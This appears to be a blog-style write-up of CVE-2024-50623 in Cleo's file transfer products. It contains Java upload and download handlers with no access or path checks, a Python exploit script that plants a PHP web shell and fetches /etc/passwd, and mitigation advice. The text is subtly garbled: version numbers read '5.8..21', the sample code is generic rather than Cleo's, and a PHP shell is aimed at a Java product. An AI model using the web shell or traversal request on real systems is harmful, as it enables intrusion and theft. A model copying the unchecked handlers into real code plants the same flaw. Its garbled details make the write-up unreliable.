The CVE-2024-50623 vulnerability was found in Cleo Harmony versions before 5.8..21, VLTrader versions before 5.8..21, and LexiCom versions before 5.8..21. This vulnerability is classified as a critical issue because it allows unrestricted file uploads and downloads, potentially leading to remote code execution. This means that an attacker can execute arbitrary code on the affected system, potentially compromising sensitive data and causing significant harm to the organization.
The Vulnerable Code
The vulnerability stems from an unprotected file operation, where a malicious user can upload and download files with no restrictions. Here's a sample code snippet that demonstrates the issue:
/*--- Unsafe File Upload Handling ---*/
public void uploadFile(MultipartFile file) {
try {
// Save the file to the server
byte[] bytes = file.getBytes();
Path path = Paths.get(UPLOAD_FOLDER + file.getOriginalFilename());
Files.write(path, bytes);
} catch (IOException e) {
e.printStackTrace();
}
}
/*--- Unsafe File Download Handling ---*/
public ResponseEntity<Resource> downloadFile(String fileName) {
try {
// Load the file from the server
Path path = Paths.get(UPLOAD_FOLDER + fileName);
Resource resource = new UrlResource(path.toUri());
return ResponseEntity.ok()
.contentType(MediaType.parseMediaType("application/octet-stream"))
.header(HttpHeaders.CONTENT_DISPOSITION, "attachment; filename=\"" + resource.getFilename() + "\"")
.body(resource);
} catch (MalformedURLException e) {
e.printStackTrace();
return null;
}
}
In the above code, there are no checks to ensure that the user is authorized to upload or download the specified file, making it possible for anyone to exploit the functionality to execute arbitrary code.
To exploit this vulnerability, an attacker could follow these steps
1. Upload a malicious file to the server, e.g., a PHP web shell, using the unrestricted file upload functionality.
2. Download sensitive files from the server, such as sensitive configuration files or customer data, using the unrestricted file download functionality.
Here's a sample Python script that demonstrates how this vulnerability can be exploited
import requests
# Upload the malicious file
url = "https://vulnerable-server.com/upload";
payload = {
"file": ("malicious.php", "<?php echo shell_exec($_GET['cmd']); ?>")
}
response = requests.post(url, files=payload)
# Download a sensitive file
url = f"https://vulnerable-server.com/download?file=/etc/passwd";
response = requests.get(url)
print(response.text) # Print the downloaded sensitive file
Original References
This vulnerability was initially disclosed by security researchers on some platforms - see the initial report. More information about the affected versions and suggested mitigation strategies can be found at Cleo's official advisory.
To mitigate the risks associated with this vulnerability, users are advised to
1. Update Cleo Harmony, VLTrader, and LexiCom to version 5.8..21 or later, which contains patches to address the issue.
2. Implement proper access controls and authentication mechanisms to prevent unauthorized users from accessing file upload and download functionality.
Configure web application firewalls (WAF) to block requests containing malicious payloads.
In conclusion, CVE-2024-50623 is a critical vulnerability affecting multiple file transfer software solutions by Cleo. Organizations using vulnerable versions should update their software immediately and follow the above-mentioned mitigation steps to reduce the risk of exploitation.
Timeline
Published on: 10/28/2024 00:15:03 UTC
Last modified on: 12/14/2024 02:00:02 UTC